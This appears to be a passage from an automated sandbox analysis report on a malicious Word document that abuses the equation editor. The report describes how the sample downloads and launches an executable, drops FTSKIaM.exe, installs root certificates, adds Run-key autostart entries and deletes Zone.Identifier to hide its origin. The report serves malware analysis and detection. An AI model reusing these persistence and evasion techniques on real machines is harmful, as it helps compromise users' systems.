Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00880F4C push eax; mov dword ptr [esp], ecx	7_2_00880F64
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20215BC0 pushfd ; ret	15_2_20215BF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2035C011 push 0C203468h; ret	15_2_2035C01D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDF35A push esi; retf	22_2_07DDF35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDFA8C push eax; iretd	22_2_07DDFA8D
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A13F4 pushfd ; retf	24_2_005A13F5
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A2C99 push ecx; ret	24_2_005A2CAC
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B13F4 pushfd ; retf	31_2_005B13F5
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B2C99 push ecx; ret	31_2_005B2CAC

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
